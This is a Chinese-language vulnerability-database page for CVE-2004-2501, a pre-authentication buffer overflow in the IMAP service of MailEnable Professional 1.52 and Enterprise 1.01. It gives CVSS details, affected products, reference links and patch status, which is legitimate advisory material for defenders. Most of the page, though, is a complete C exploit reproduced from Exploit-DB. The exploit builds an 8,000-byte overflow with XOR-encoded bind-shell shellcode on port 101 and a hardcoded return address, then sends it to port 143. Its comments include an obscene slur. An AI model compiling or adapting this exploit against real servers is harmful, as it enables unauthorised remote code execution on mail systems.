CVE-2004-2501
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:19
NMCOE    

[原文]Buffer overflow in the IMAP service of MailEnable Professional Edition 1.52 and Enterprise Edition 1.01 allows remote attackers to execute arbitrary code via (1) a long command string or (2) a long string to the MEIMAP service and then terminating the connection.


[CNNVD]MailEnable IMAP Service多个远程Pre-Authentication缓冲区溢出漏洞(CNNVD-200412-1125)

        MailEnable Professional Edition 1.52和Enterprise Edition 1.01版本的IMAP service存在缓冲区溢出漏洞。远程攻击者借助(1)超长命令字符串或者(2)MEIMAP service的超长字符串执行任意代码然后终止连接。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mailenable:mailenable_enterprise:1.01
cpe:/a:mailenable:mailenable_professional:1.52

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2501
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2501
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1125
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/11755
(PATCH)  BID  11755
http://www.hat-squad.com/en/000102.html
(VENDOR_ADVISORY)  MISC  http://www.hat-squad.com/en/000102.html
http://securitytracker.com/id?1012327
(VENDOR_ADVISORY)  SECTRACK  1012327
http://secunia.com/advisories/13318
(VENDOR_ADVISORY)  SECUNIA  13318
http://archives.neohapsis.com/archives/bugtraq/2004-11/0349.html
(VENDOR_ADVISORY)  BUGTRAQ  20041125 Remote buffer overflow in MailEnable IMAP service [Hat-Squad Advisory]
http://xforce.iss.net/xforce/xfdb/18286
(UNKNOWN)  XF  mailenable-imap-code-execution(18286)
http://xforce.iss.net/xforce/xfdb/18285
(UNKNOWN)  XF  mailenable-imap-bo(18285)
http://www.osvdb.org/12136
(UNKNOWN)  OSVDB  12136
http://www.osvdb.org/12135
(UNKNOWN)  OSVDB  12135

- 漏洞信息

MailEnable IMAP Service多个远程Pre-Authentication缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2007-07-24 00:00:00
远程  
        MailEnable Professional Edition 1.52和Enterprise Edition 1.01版本的IMAP service存在缓冲区溢出漏洞。远程攻击者借助(1)超长命令字符串或者(2)MEIMAP service的超长字符串执行任意代码然后终止连接。

- 公告与补丁

        It is reported that the vendor has released a fix for this vulnerability. This fix does not appear to be available at the time of writing. Reports indicate that the fix will be available at the following location:
        http://mailenable.com/hotfix.asp
        Customers are advised to contact the vendor for further details in regards to obtaining and applying appropriate updates
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (658)

MailEnable Mail Server IMAP <= 1.52 Remote Buffer Overflow Exploit (EDBID:658)
windows remote
2004-11-25 Verified
143 class101
N/A [点击下载]
/*
 
MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
 
Homepage         : www.mailenable.com
Affected versions: Pro        v1.52
       Enterprise v1.01
 
Bug discovery    : Nima Majidi at www.hat-squad.com
Exploit code     : class101    at www.hat-squad.com
           & dfind.kd-team.com
 
Fix              : http://mailenable.com/hotfix/MEIMAPS-HF041125.zip
 
Compilation      : 101_ncat.cpp ......... Win32 (MSVC,cygwin)
                   101_ncat.c ........... Linux
 
*/
 
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
 
file://BIND shellcode port 101, XORed 0x88, thanx HDMoore.
 
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
 
static char payload[10000];
 
char magikcll[]="\x7a\x8c\x01\x10"; file://CALL EDI - MEAISP.dll - "Universal"
char gay[]="\x4b\x2d\x4f\x54\x69\x4b"; file://long F0CK to them
 
void usage(char* us);
 
#ifdef WIN32
 WSADATA wsadata;
#endif
 
void ver();
 
int main(int argc,char *argv[])
{
 ver();
 if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;} 
#ifndef WIN32
#define Sleep  sleep
#define SOCKET  int
#define closesocket(s) close(s)
#else
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
#endif
 int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, a;
 char *target, *os;
 if (argc==4){port=atoi(argv[3]);}
 else port=143;
 if (atoi(argv[1]) == 1){target=magikcll;os="Win2k SP4 Pro    English\n[+]         Win2k SP4 Pro    French\n[+]         Win2k SP4 Server English\n[+]         all Win2k, NT4 (supposed)";}
 SOCKET s;fd_set mask;struct timeval timeout;struct sockaddr_in server;
 s=socket(AF_INET,SOCK_STREAM,0);
 if (s==-1) {printf("[+] socket() error\n");return -1;}
 printf("[+] target: %s\n",os);   
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);
 server.sin_port=htons(port);
 connect(s,( struct sockaddr *)&server,sizeof(server));
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))
 {
  case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
  case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {
   printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
   Sleep(2000);
#else
   Sleep(2);
#endif
   sizeA=8202-sizeof(scode);
   sz=3+8198+4;
   memset(payload,0,sizeof(payload));
   strcat(payload,"\x41\x41\x41");
   strcat(payload,scode);
   for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
   strcat(payload,target);
   strcat(payload,"\r\n");
      if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error, the server prolly rebooted.");return -1;}
#ifdef WIN32
   Sleep(1000);
#else
   Sleep(1);
#endif
   printf("[+] size of payload: %d\n",sz);   
   printf("[+] payload send, connect the port 101 to get a shell.\n");
   return 0;
  }
 }
 closesocket(s);
#ifdef WIN32
 WSACleanup();
#endif
 return 0;
}
 

void usage(char* us)
{ 
 printf("USAGE: 101_mEna.exe Target Ip Port\n");
 printf("TARGETS:                               \n");
 printf("      [+] 1. Win2k SP4 Pro    English  (*)\n");
 printf("      [+] 1. Win2k SP4 Pro    French   (*)\n");
 printf("      [+] 1. Win2k SP4 Server English  (*)\n");
 printf("      [+] 1. All Win2K, NT4               \n");
 printf("NOTE:                               \n");
 printf("      The port 143 is default if no port are specified\n");
 printf("      The exploit bind a shellcode to the port 101\n");
 printf("      A wildcard (*) mean Tested.\n");
 return;
}
void ver()
{ 
printf("                                                                   \n");
printf("        ===================================================[v0.1]====\n");
printf("        ======MailEnable, Pro Mail Server for Windows <= v1.52=======\n");
printf("        ========IMAP Service, Remote Buffer Overflow Exploit=========\n");
printf("        ======coded by class101=============[Hat-Squad.com 2004]=====\n");
printf("        =============================================================\n");
printf("                                                                   \n");
}

// milw0rm.com [2004-11-25]
		

- 漏洞信息

12135
MailEnable IMAP Remote Stack Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in MailEnable's IMAP service. The IMAP service contains boundary errors which result in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-11-25 Unknow
2004-11-25 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站